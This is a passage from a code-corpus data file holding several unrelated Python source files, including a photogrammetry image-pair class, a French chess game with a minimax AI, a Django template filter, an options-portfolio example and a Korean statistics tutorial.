filter_data()\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301537217","text":"from Camera import Camera\nfrom SingleImage import SingleImage\nfrom MatrixMethods import Compute3DRotationMatrix, Compute3DRotationDerivativeMatrix, ComputeSkewMatrixFromVector\nimport numpy as np\nimport numpy.linalg as la\n\n\nclass ImagePair(object):\n\n def __init__(self, image1, image2):\n \"\"\"\n Initialize the ImagePair class\n :param image1: First image\n :param image2: Second image\n \"\"\"\n self.__image1 = image1\n self.__image2 = image2\n self.__relativeOrientationImage1 = np.array([0, 0, 0, 0, 0, 0]) # The relative orientation of the first image\n self.__relativeOrientationImage2 = None # The relative orientation of the second image\n self.__absoluteOrientation = None\n self.__isSolved = False # Flag for the relative orientation\n\n @property\n def isSolved(self):\n \"\"\"\n Flag for the relative orientation\n returns True if the relative orientation is solved, otherwise it returns False\n\n :return: boolean, True or False values\n \"\"\"\n return self.__isSolved\n\n @property\n def RotationMatrix_Image1(self):\n \"\"\"\n return the rotation matrix of the first image\n\n :return: rotation matrix\n\n :rtype: np.array 3x3\n \"\"\"\n return Compute3DRotationMatrix(self.__relativeOrientationImage1[0], self.__relativeOrientationImage1[1],\n self.__relativeOrientationImage1[2])\n\n @property\n def RotationMatrix_Image2(self):\n \"\"\"\n return the rotation matrix of the second image\n\n :return: rotation matrix\n\n :rtype: np.array 3x3\n \"\"\"\n return Compute3DRotationMatrix(self.__relativeOrientationImage2[0], self.__relativeOrientationImage2[1],\n self.__relativeOrientationImage2[2])\n\n @property\n def PerspectiveCenter_Image1(self):\n \"\"\"\n return the perspective center of the first image\n\n :return: perspective center\n\n :rtype: np.array (3, )\n \"\"\"\n return self.__relativeOrientationImage1[0:3]\n\n @property\n def PerspectiveCenter_Image2(self):\n \"\"\"\n return the perspective center of the second image\n\n :return: perspective center\n\n :rtype: np.array (3, )\n \"\"\"\n return self.__relativeOrientationImage2[0:3]\n\n def ImagesToGround(self, imagePoints1, imagePoints2, Method=None):\n \"\"\"\n Computes ground coordinates of homological points\n\n :param imagePoints1: points in image 1\n :param imagePoints2: corresponding points in image 2\n :param Method: method to use for the ray intersection, three options 
exist: geometric, vector, Collinearity\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type Method: string\n\n :return: ground points, their accuracies.\n\n :rtype: dict\n\n .. warning::\n\n This function is empty, need implementation\n\n\n **Usage example**\n\n .. code-block:: py\n\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n\n imagePoints1 = np.array([[-4.83,7.80],\n [-4.64, 134.86],\n [5.39,-100.80],\n [4.58,55.13],\n [98.73,9.59],\n [62.39,128.00],\n [67.90,143.92],\n [56.54,-85.76]])\n imagePoints2 = np.array([[-83.17,6.53],\n [-102.32,146.36],\n [-62.84,-102.87],\n [-97.33,56.40],\n [-3.51,14.86],\n [-27.44,136.08],\n [-23.70,152.90],\n [-8.08,-78.07]])\n\n new = ImagePair(image1, image2)\n\n new.ImagesToGround(imagePoints1, imagePoints2, 'geometric'))\n\n \"\"\"\n picpoints_3574_mm = self.__image1.ImageToCamera(imagePoints1)\n picpoints_3575_mm = self.__image1.ImageToCamera(imagePoints2)\n exori_XYZ_1 = self.__image1.exteriorOrientationParameters[0:3]\n exori_XYZ_2 = self.__image2.exteriorOrientationParameters[0:3]\n\n result_Gpoints = []\n dist_e = []\n\n for i in range(picpoints_3574_mm.shape[0]): #calculating per point set\n # following the geometric method for forward intersection:\n x_img1 = np.hstack((picpoints_3574_mm[i, :], -self.__image1.camera.focalLength)) / 1000 # to meter\n x_img2 = np.hstack((picpoints_3575_mm[i, :], -self.__image2.camera.focalLength)) / 1000\n v_img1 = (np.dot(Compute3DRotationMatrix(self.__image1.exteriorOrientationParameters[3],\\\n self.__image1.exteriorOrientationParameters[4],\\\n self.__image1.exteriorOrientationParameters[5]), x_img1)).reshape(3, 1) # Rotating vector +T\n v_img2 = (np.dot(Compute3DRotationMatrix(self.__image1.exteriorOrientationParameters[3],\\\n self.__image1.exteriorOrientationParameters[4],\\\n self.__image1.exteriorOrientationParameters[5]), x_img2)).reshape(3, 1) # Rotating vector +T\n v_img1 /= la.norm(v_img1) # normalization\n v_img2 /= la.norm(v_img2)\n\n # Creating proper vectors\n vvt_img1 = np.dot(v_img1, v_img1.T)\n vvt_img2 = np.dot(v_img2, v_img2.T)\n I = np.eye(v_img1.shape[0])\n\n # Partial derivatives\n A_img1 = I - v_img1\n A_img2 = I - v_img2\n\n # L vector\n l1 = np.dot(A_img1, exori_XYZ_1)\n l2 = np.dot(A_img2, exori_XYZ_2)\n\n # Stack\n A = np.vstack((A_img1, A_img2))\n l = np.hstack((l1, l2))\n\n # Direct solution (no iterations needed)\n X = np.dot(la.inv(np.dot(A.T, A)), np.dot(A.T, l))\n # dist_e1 = np.dot((I - vvt_img1), X - exori_XYZ_1)\n dist_e1 = np.dot(A_img1, X)- l1\n # dist_e2 = np.dot((I - vvt_img2), X - exori_XYZ_2)\n dist_e2 = np.dot(A_img2, X)- l2\n\n dist_e.append((np.abs(dist_e1) + np.abs(dist_e2)) / 2) #Average\n result_Gpoints.append(X)\n\n return np.array(result_Gpoints), np.array(dist_e)\n\n def ComputeDependentRelativeOrientation(self, imagePoints1, imagePoints2, initialValues):\n \"\"\"\n Compute relative orientation parameters\n\n :param imagePoints1: points in the first image [m\"m]\n :param imagePoints2: corresponding points in image 2(homology points) nx2 [m\"m]\n :param initialValues: approximate values of relative orientation parameters\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type initialValues: np.array (6L,)\n\n :return: relative orientation parameters.\n\n :rtype: np.array 5x1 / ADD\n\n .. warning::\n\n Can be held either as dictionary or array. For your implementation and decision.\n\n .. 
note::\n\n Do not forget to decide how it is held and document your decision\n\n\n **Usage example**\n\n .. code-block:: py\n\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n\n imagePoints1 = np.array([[-4.83,7.80],\n [-4.64, 134.86],\n [5.39,-100.80],\n [4.58,55.13],\n [98.73,9.59],\n [62.39,128.00],\n [67.90,143.92],\n [56.54,-85.76]])\n imagePoints2 = np.array([[-83.17,6.53],\n [-102.32,146.36],\n [-62.84,-102.87],\n [-97.33,56.40],\n [-3.51,14.86],\n [-27.44,136.08],\n [-23.70,152.90],\n [-8.08,-78.07]])\n new = ImagePair(image1, image2)\n\n new.ComputeDependentRelativeOrientation(imagePoints1, imagePoints2, np.array([1, 0, 0, 0, 0, 0])))\n\n \"\"\"\n pass # delete after implementation\n\n def Build_A_B_W(self, cameraPoints1, cameraPoints2, x):\n \"\"\"\n Function for computing the A and B matrices and vector w.\n :param cameraPoints1: points in the first camera system\n :param ImagePoints2: corresponding homology points in the second camera system\n :param x: initialValues vector by, bz, omega, phi, kappa ( bx=1)\n\n :type cameraPoints1: np.array nx3\n :type cameraPoints2: np.array nx3\n :type x: np.array (5,1)\n\n :return: A ,B matrices, w vector\n\n :rtype: tuple\n \"\"\"\n numPnts = cameraPoints1.shape[0] # Number of points\n\n dbdy = np.array([[0, 0, 1], [0, 0, 0], [-1, 0, 0]])\n dbdz = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 0]])\n\n dXdx = np.array([1, 0, 0])\n dXdy = np.array([0, 1, 0])\n\n # Compute rotation matrix and it's derivatives\n rotationMatrix2 = Compute3DRotationMatrix(x[2, 0], x[3, 0], x[4, 0])\n dRdOmega = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'omega')\n dRdPhi = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'phi')\n dRdKappa = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'kappa')\n\n # Create the skew matrix from the vector [bx, by, bz]\n bMatrix = ComputeSkewMatrixFromVector(np.array([1, x[0, 0], x[1, 0]]))\n\n # Compute A matrix; the coplanar derivatives with respect to the unknowns by, bz, omega, phi, kappa\n A = np.zeros((numPnts, 5))\n A[:, 0] = np.diag(\n np.dot(cameraPoints1,\n np.dot(dbdy, np.dot(rotationMatrix2, cameraPoints2.T)))) # derivative in respect to by\n A[:, 1] = np.diag(\n np.dot(cameraPoints1,\n np.dot(dbdz, np.dot(rotationMatrix2, cameraPoints2.T)))) # derivative in respect to bz\n A[:, 2] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdOmega, cameraPoints2.T)))) # derivative in respect to omega\n A[:, 3] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdPhi, cameraPoints2.T)))) # derivative in respect to phi\n A[:, 4] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdKappa, cameraPoints2.T)))) # derivative in respect to kappa\n\n # Compute B matrix; the coplanar derivatives in respect to the observations, x', y', x'', y''.\n B = np.zeros((numPnts, 4 * numPnts))\n k = 0\n for i in range(numPnts):\n p1vec = cameraPoints1[i, :]\n p2vec = cameraPoints2[i, :]\n B[i, k] = np.dot(dXdx, np.dot(bMatrix, np.dot(rotationMatrix2, p2vec)))\n B[i, k + 1] = np.dot(dXdy, np.dot(bMatrix, np.dot(rotationMatrix2, p2vec)))\n B[i, k + 2] = np.dot(np.dot(p1vec, np.dot(bMatrix, rotationMatrix2)), dXdx)\n B[i, k + 3] = np.dot(np.dot(p1vec, np.dot(bMatrix, rotationMatrix2)), dXdy)\n k += 4\n\n # w vector\n w = np.diag(np.dot(cameraPoints1, np.dot(bMatrix, np.dot(rotationMatrix2, cameraPoints2.T))))\n\n return A, B, w\n\n def ImagesToModel(self, imagePoints1, imagePoints2, Method):\n \"\"\"\n Mapping points from image 
space to model space\n\n :param imagePoints1: points from the first image\n :param imagePoints2: points from the second image\n :param Method: method for intersection\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type Method: string\n\n :return: corresponding model points\n :rtype: np.array nx3\n\n\n .. warning::\n\n This function is empty, need implementation\n\n .. note::\n\n One of the images is a reference, orientation of this image must be set.\n\n \"\"\"\n\n def GroundToImage(self, groundPoints):\n \"\"\"\n Transforming ground points to image points\n\n :param groundPoints: ground points [m]\n\n :type groundPoints: np.array nx3\n\n :return: corresponding Image points\n\n :rtype: np.array nx2\n\n \"\"\"\n pass\n\n # 1. calculating pic plane\n # 2. calculating intersection of vector from perspective center to ground poind\n\n\n def geometricIntersection(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray Intersection based on geometric calculations.\n\n :param cameraPoints1: points in the first image\n :param cameraPoints2: corresponding points in the second image\n\n :type cameraPoints1: np.array nx3\n :type cameraPoints2: np.array nx3\n\n :return: lambda1, lambda2 scalars\n\n :rtype: np.array nx2\n\n .. warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n def vectorIntersction(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray Intersection based on vector calculations.\n\n :param cameraPoints1: points in image space\n :param cameraPoints2: corresponding image points\n\n :type cameraPoints1: np.array nx\n :type cameraPoints2: np.array nx\n\n\n :return: lambda1, lambda2 scalars\n\n :rtype: np.array nx2\n\n .. warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n def CollinearityIntersection(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray intersection based on the collinearity principle\n\n :param cameraPoints1: points in image space\n :param cameraPoints2: corresponding image points\n\n :type cameraPoints1: np.array nx2\n :type cameraPoints2: np.array nx2\n\n :return: corresponding ground points\n\n :rtype: np.array nx3\n\n .. 
warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n\nif __name__ == '__main__':\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n leftCamPnts = np.array([[-4.83, 7.80],\n [-4.64, 134.86],\n [5.39, -100.80],\n [4.58, 55.13],\n [98.73, 9.59],\n [62.39, 128.00],\n [67.90, 143.92],\n [56.54, -85.76]])\n rightCamPnts = np.array([[-83.17, 6.53],\n [-102.32, 146.36],\n [-62.84, -102.87],\n [-97.33, 56.40],\n [-3.51, 14.86],\n [-27.44, 136.08],\n [-23.70, 152.90],\n [-8.08, -78.07]])\n new = ImagePair(image1, image2)\n\n print(new.ComputeDependentRelativeOrientation(leftCamPnts, rightCamPnts, np.array([1, 0, 0, 0, 0, 0])))\n","sub_path":"ImagePair.py","file_name":"ImagePair.py","file_ext":"py","file_size_in_byte":15304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"614987561","text":"#-*- coding : utf-8 -*-\nimport echecsGUI\nimport echecs\nimport tkinter as tk\nimport minimax\n\n\n\ntypeJeu = \"\" #type de jeu, Humain-Humain, Humain-IA ou IA-IA\nlistEchiquier = [] #liste de tous les Echiquier joué\n\ndef askPromotion(echiq,fenetre):\n \"\"\"demande quel promotion le joueur veut pour son pion\"\"\"\n signal = [False] #la valeur changera à True lorsque le joueur aura fait son choix\n fenetre.unbind(\"\") #empeche de jouer\n popUp = tk.Toplevel(fenetre,width = 200,height = 200) #cree une petite fenetre\n popUp.title(\"Promotion\")\n popUp.resizable(False,False)\n popUp.protocol('WM_DELETE_WINDOW', lambda : clickOk(fenetre,popUp,signal)) #lorsque l'on ferme la fenetre de promotion appele clickOk\n lab = tk.Label(popUp,text = \"Quel promotion pour le pion ?\") #texte qui s'affiche dans la fenetre\n lab.pack()\n listProm = [\"Reine\",\"Tour\",\"Fou\",\"Cavalier\"]\n varProm = tk.IntVar()\n varProm.set(0)\n for i in range(4): #cree 4 bouton, la valeur du bouton selectionné se trouvera dans varProm\n rad = tk.Radiobutton(popUp,variable = varProm,text = listProm[i],value = i)\n rad.pack()\n \n okBut = tk.Button(popUp,text = \"OK\",command = lambda : clickOk(fenetre,popUp,signal)) #bouton OK, le click appele clickOk\n okBut.pack()\n while(not signal[0]): #bloque tant que le joueur n'a pas fait son choix\n fenetre.update()\n\n popUp.destroy() #detruit la fenetre de promotion\n listProm = [\"Q\",\"T\",\"F\",\"C\"]\n return listProm[varProm.get()] #retourne la lettre correspondant au choix fait\n\ndef clickOk(fenetre,popUp,signal):\n \"\"\"fonction appelé lorsque l'on ferme la fenetre de promotion ou lorsque l'on click sur OK\"\"\"\n fenetre.bind(\"\",click) #autorise les clics\n signal[0] = True #indique que le choix a été fait\n\ndef checkVictoire(echiq,fenetre):\n \"\"\"verifie si quelqu'un à gagné et bloque le jeu si c'est le cas\"\"\"\n vic = echiq.checkVictoire()\n if(vic == \"Echecs et Mat\"):\n if(echiq.joueur):\n camp = \"BLANCS\"\n else:\n camp = \"NOIRS\"\n fenetre.unbind(\"\")\n fenetre.title(\"Echecs et Mat, victoire pour les \"+camp)\n fenetre.bell() #emet un son\n return True\n \n elif(vic == \"Pat\"):\n fenetre.unbind(\"\")\n fenetre.title(\"PAT\")\n fenetre.bell()\n return True\n \n return False\n\ndef joueIA(echiqWid):\n \"\"\"fait joueur l'IA\"\"\"\n echiqWid.fenetre.unbind(\"\")\n interdits = []\n if(typeJeu == \"IA-IA\"):\n for i in range(4,11,2):\n if(len(listEchiquier) >= i): #si le jeu est en IA-IA on empeche de le bloquer sur les 4,6,8,10 meme coups en devalorisant l'echiquier d'il y'a 4,6,8,10 coups\n 
interdits.append(listEchiquier[len(listEchiquier)-i])\n nouvEchiq,prof = minimax.approfProgressif(echiqWid.echiq,echiqWid.echiq.joueur,5,15,interdits,True) #utilise l'appronfondissement progressif avec 5 secondes\n echiqWid.setEchiq(nouvEchiq) #affiche l'echiquier choisi \n listEchiquier.append(nouvEchiq) \n if((not checkVictoire(nouvEchiq,echiqWid.fenetre)) and typeJeu == \"IA-IA\"): #si personne à gagné et que c'est un jeu IA-IA\n joueIA(echiqWid) #refait jouer l'IA\n elif(typeJeu == \"Humain-IA\"): #si un humain joue, autorise les clics\n echiqWid.fenetre.bind(\"\",click)\n \n\ndef click(event):\n \"\"\"fonction appelé lors d'un clic\"\"\"\n caseWid = event.widget #le widget sur lequel on a clické\n if(not isinstance(caseWid,echecsGUI.CaseWidget)): #si ce widget n'est pas une case, on arrete\n return\n echiqWid = caseWid.echiqWid\n if(caseWid in echiqWid.mark): #si c'est une case avec une marque\n posDepl = caseWid.pos \n nouvEchiq = echiqWid.echiq.deplPiece(echiqWid.select.pos,echiqWid.select.lettre,echiqWid.echiq.joueur,posDepl) #recupere l'echiquier apres le deplacemet\n echiqWid.setEchiq(nouvEchiq) #on l'affiche\n if((nouvEchiq.bitBoards[(\"P\", not nouvEchiq.joueur)] & echecs.bitOn(posDepl)) and (posDepl[0] == 7 or posDepl[0] == 0)): #si une promotion doit avoir lieu\n prom = askPromotion(nouvEchiq,echiqWid.fenetre) #on la demande\n nouvEchiq.promotion(posDepl,not nouvEchiq.joueur,prom) #on fait promotion\n echiqWid.setEchiq(nouvEchiq)\n listEchiquier.append(nouvEchiq) #on met à jour l'echiquier affiché\n if((not checkVictoire(nouvEchiq,echiqWid.fenetre)) and typeJeu == \"Humain-IA\"): #si personne à gagné et que une IA joue, fait jouer l'IA\n joueIA(echiqWid)\n else: #si il n'y avait pas de marque\n caseWid.select() #selectionne la case\n\n\nchoix = \"\"\nprint(\"quel type de jeu ?\")\nwhile(choix != \"1\" and choix != \"2\" and choix != \"3\"):\n print(\"pour Humain-Humain entrez : 1\")\n print(\"Humain-IA : 2\")\n print(\"IA-IA : 3\")\n choix = input(\"\")\n\nif(choix == \"1\"):\n typeJeu = \"Humain-Humain\"\nelif(choix == \"2\"):\n typeJeu = \"Humain-IA\"\nelif(choix == \"3\"):\n typeJeu = \"IA-IA\"\n\n\nfen = tk.Tk() #cree la fenetre\nfen.title(\"Jeu d'échecs\")\nfen.resizable(False,False)\nechiquierWid = echecsGUI.EchiquierWidget(fen,echecs.Echiquier(False)) #cree un EchiquierWidget avec l'echiquier de depart et le joueur blanc qui commence\nechiquierWid.pack() #on affiche l'echiquier\nif(typeJeu == \"IA-IA\"):\n fen.update()\n joueIA(echiquierWid)\nelse:\n fen.bind(\"\",click)\nfen.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120981934","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef index(a_list, i):\n \"\"\"\n Given a list. 
Returns the item at index i\n Allows dynamin list indexing in templates\n \"\"\"\n try:\n return a_list[int(i)]\n except IndexError:\n return None\n","sub_path":"core/templatetags/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378486726","text":"\"\"\"\n후보키\nhttps://programmers.co.kr/learn/courses/30/lessons/42890\n\"\"\"\nfrom itertools import combinations\nfrom collections import defaultdict\n\n\ndef check(case, data):\n case = list(case)\n data = sum(data.values(), [])\n for i in range(1, len(case) + 1):\n for ccase in combinations(case, i):\n if list(ccase) in data:\n return False\n return True\n\n\ndef solution2(relation):\n data = defaultdict(list)\n r = len(relation)\n c = len(relation[0])\n cols = list(map(list, zip(*relation)))\n arr = [i for i in range(c)]\n\n for i in range(1, c + 1):\n for case in combinations(arr, i):\n if check(case, data):\n temp = list(map(list, zip(*[cols[x] for x in case])))\n temp = [\"_\".join(x) for x in temp]\n if len(set(temp)) == r:\n data[len(case)].append(list(case))\n return sum([len(v) for v in data.values()])\n\n\ndef solution(relation):\n answer_list = list()\n col = len(relation[0])\n row = len(relation)\n\n for i in range(1, 1 << col): # 1 ~ 16 : 전체 경우의 수 -> combination 대신\n for num in answer_list:\n if (num & i) == num: # answer_list에 i(부분 집합)가 존재하는 경우\n break\n else:\n tmp_set = set()\n for j in range(row):\n tmp = ''\n for k in range(col):\n if i & (1 << k): # 원소 포함 여부\n tmp += str(relation[j][k])\n tmp_set.add(tmp)\n\n if len(tmp_set) == row:\n answer_list.append(i)\n\n return len(answer_list)\n\n\nprint(solution([[\"100\", \"ryan\", \"music\", \"2\"], [\"200\", \"apeach\", \"math\", \"2\"], [\"300\", \"tube\", \"computer\", \"3\"],\n [\"400\", \"con\", \"computer\", \"4\"], [\"500\", \"muzi\", \"music\", \"3\"], [\"600\", \"apeach\", \"music\", \"2\"]]))\n","sub_path":"2021/20주차/후보키/하현준.py","file_name":"하현준.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170523812","text":"import pandas as pd\n\nfrom utils.utils import date_string_to_datetime_obj\nfrom market.market import MarketEnvironment\nfrom options.options import PlainVanillaOption\nfrom portfolio.portfolio import Portfolio\n\ndef main():\n\n #\n # portfolio instantiation example\n #\n \n # if np_output is True, the output will be np.ndarray, otherwise pd.DataFrame \n np_output = False # True\n \n # default market environment\n market_env = MarketEnvironment(t=\"01-06-2020\")\n print(market_env)\n\n # underlying values to test\n S_vector = [60, 90, 120]\n print(\"S_vector: {}\\n\".format(S_vector))\n \n # options maturities\n T_call = \"31-12-2020\"\n T_put = \"30-06-2021\"\n \n # options strikes\n K_put = 80\n K_call = 110\n \n # portfolio options positions\n call_pos = 2\n put_pos = -5\n\n #\n # Step 0: empty portfolio initialized\n #\n \n ptf = Portfolio()\n print(ptf)\n \n #\n # Step 1: adding 2 long plain-vanilla call contracts\n #\n \n # plain-vanilla call option\n call = PlainVanillaOption(market_env, K=K_call, T=T_call)\n print(call)\n \n # adding contract to portfolio \n ptf.add_instrument(call, call_pos)\n print(ptf)\n\n # a date-range of 5 valuation dates between t and the nearest maturity\n t_range = pd.date_range(start=ptf.get_t(), \n end=min(T_call, T_put, key=date_string_to_datetime_obj), \n periods=5)\n print(\"t ([t...T] 
pd.date_range): {}\\n\".format(t_range))\n \n # portfolio value\n print(\"\\nPortfolio Value:\\n\", ptf.price(S=S_vector, t=t_range, np_output=np_output))\n\n # verification with benchmark value\n bechmark_value = call_pos * call.price(S=S_vector, t=t_range, np_output=np_output)\n print(\"\\nbenchmark value:\\n\", bechmark_value) \n\n # portfolio P&L\n print(\"\\nPortfolio P&L:\\n\", ptf.PnL(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark P&L\n benchmark_pnl = call_pos * call.PnL(S=S_vector, t=t_range, np_output=np_output) \n print(\"\\nbenchmark P&L:\\n\", benchmark_pnl)\n \n #\n # Step 2: adding 5 short plain-vanilla put contracts\n #\n \n # plain-vanilla put option\n put = PlainVanillaOption(market_env, option_type=\"put\", K=K_put, T=T_put)\n print(put)\n \n # adding contract to portfolio \n ptf.add_instrument(put, put_pos)\n print(ptf)\n \n # portfolio value\n print(\"\\nPortfolio Value:\\n\", ptf.price(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark value\n benchmark_value = call_pos * call.price(S=S_vector, t=t_range, np_output=np_output) + \\\n put_pos * put.price(S=S_vector, t=t_range, np_output=np_output)\n print(\"\\nbenchmark value:\\n\", benchmark_value) \n\n # portfolio P&L\n print(\"\\nPortfolio P&L:\\n\", ptf.PnL(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark P&L\n benchmark_pnl = call_pos * call.PnL(S=S_vector, t=t_range, np_output=np_output) + \\\n put_pos * put.PnL(S=S_vector, t=t_range, np_output=np_output) \n print(\"\\nbenchmark P&L:\\n\", benchmark_pnl)\n \n#----------------------------- usage example ---------------------------------#\nif __name__ == \"__main__\":\n \n main() \n","sub_path":"pyBlackScholesAnalytics/example_portfolio.py","file_name":"example_portfolio.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602890532","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 15 17:11:01 2022.\n\n@author: fabian\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\ndfs = []\nfor api, path in zip(snakemake.input.keys(), snakemake.input):\n df = pd.read_csv(path, skiprows=1, header=None, sep=\" \")\n\n df.columns = [\"API\", \"Memory\", \"Time\"]\n df.API = api\n df.Time -= df.Time[0]\n dfs.append(df)\n\ndf = pd.concat(dfs, ignore_index=True)\n\nfig, ax = plt.subplots(figsize=(8, 6))\nsns.lineplot(data=df, y=\"Memory\", x=\"Time\", hue=\"API\", style=\"API\", ax=ax)\nax.set_xlabel(\"Time [s]\")\nax.set_ylabel(\"Memory Usage [MB]\")\n# ax.set_xlim()\nfig.tight_layout()\nfig.savefig(snakemake.output[0])\n","sub_path":"benchmark/scripts/leftovers/benchmarks-pypsa-eur/plot-benchmarks.py","file_name":"plot-benchmarks.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"100870006","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass ClearSelector():\n def __init__(self, backbone_path, backbone_x, backbone_y, svm_path, mean, std, preprocess_func):\n self.backbone = tf.keras.models.load_model(backbone_path)\n self.x = backbone_x\n self.y = backbone_y\n\n # might be getting BRG from open cv, so image array may need further processing\n def run_on_img(self, im):\n im = tf.image.resize(im, [self.x, self.y]).numpy()\n im = np.reshape(im, [1, self.x, self.y, 3])\n return self.backbone.predict(tf.image.resize(im, 
[224, 224]))[0][0]\n\n\nif __name__ == \"__main__\":\n params = {\"backbone_path\": \"\", \"backbone_x\": 224, \"backbone_y\": 224,\n \"svm_path\": \"\", \"mean\": 0, \"std\": 1, \"preprocess_func\": None}\n selector = ClearSelector(**params)\n","sub_path":"code/model_components/model_frame_selection.py","file_name":"model_frame_selection.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422752637","text":"# MenuTitle: Tab with vertically shifted components\n# -*- coding: utf-8 -*-\n\nthisFont = Glyphs.font # frontmost font\nthisFontMaster = thisFont.selectedFontMaster # active master\nlistOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs\n\nglyphList = []\n\nfor layer in listOfSelectedLayers:\n if hasattr(layer.parent, \"name\"):\n components = [\n component for component in layer.components if component.position.y != 0.0\n ]\n if len(components):\n glyphList.append(layer.parent.name)\n\n\nif len(glyphList):\n tabString = \"/\" + \"/\".join(glyphList)\n thisFont.newTab(tabString)\nelse:\n Message(\"Everything ok\", \"Not vertically shifted components\")\n","sub_path":"Tabs/Tab with vertically shifted components.py","file_name":"Tab with vertically shifted components.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"198880720","text":"\"\"\"\n# 중심 경향성( central tendency)\n: 대부분 평균(average)를 사용\n\"\"\"\nfrom typing import List\n\nnum_friends = [100, 49, 41, 40, 25 ] #... 등등 더 많은 데이터\n\ndef mean(xs: List[float]) -> float :\n return sum(xs) / len(xs)\n\nprint(mean(num_friends)) # 51.0\n \n\n\"\"\"\n# 중앙값 (median)\n : 전체 데이터에서 가장 중앙에 있는 데이터 포인트\n : 데이터가 짝수일 경우 - 가장 중앙에 있는 두 데이터 포인트의 평균\n\"\"\"\n# 밑줄 표시로 시작하는 함수는 프라이빗 함수를 의미하며\n# median 함수를 사용하는 사람이 직접 호출하는 것이 아닌\n# median 함수만 호출하도록 생성되었다.\n\ndef _median_odd(xs: List[float]) -> float:\n \"\"\"len(xs)가 홀수면 중앙값을 반환\"\"\"\n return sorted(xs)[len(xs)//2]\n\ndef _median_even(xs: List[float]) -> float:\n \"\"\"len(xs)가 짝수면 두 중앙값의 평균을 반환\"\"\"\n sorted_xs = sorted(xs)\n hi_midpoint = len(xs) // 2 # length =4, hi_midpoint =2\n return (sorted_xs[hi_midpoint - 1] + sorted_xs[hi_midpoint]) / 2\n\ndef median(v: List[float]) -> float:\n \"\"\"v의 중앙값을 계산\"\"\"\n return _median_even(v) if len(v) % 2 == 0 else _median_odd(v)\n\nassert median([1, 10, 2, 9, 5]) == 5\nassert median([1, 9, 2, 10]) == (2 + 9) / 2\n\nprint(median(num_friends)) # 41\n\n\n\"\"\"\n# 분위( quantile )\n: 중앙값을 포괄하는 개념\n: 특정 백분위 보다 낮은 분위에 속하는 데이터를 의미한다.\n\"\"\"\ndef quantile(xs : List[float], p: float) -> float:\n \"\"\"x의 p분위에 속하는 값을 반환\"\"\"\n p_index = int(p * len(xs))\n return sorted(xs)[p_index]\n\nprint(quantile(num_friends, 0.10)) # 25\nprint(quantile(num_friends, 0.25)) # 40\nprint(quantile(num_friends, 0.75)) # 49\nprint(quantile(num_friends, 0.90)) # 100\n\n\n\"\"\"\n# 최빈값( mode )\n : 데이터에서 가장 자주 나오는 값\n\"\"\"\nfrom collections import Counter\n\ndef mode(x: List[float]) -> List[float]:\n \"\"\"최빈값이 하나보다 많을수도 있으니 결과를 리스트로 반환\"\"\"\n counts = Counter(x)\n max_count = max(counts.values())\n return [x_i for x_i, count in counts.items()\n if count == max_count]\n\nx = [1, 1, 2, 3, 4, 5, 5, 5]\nprint(set(mode(x))) # {5}","sub_path":"homework/데이터 과학/p071_central_tendency.py","file_name":"p071_central_tendency.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
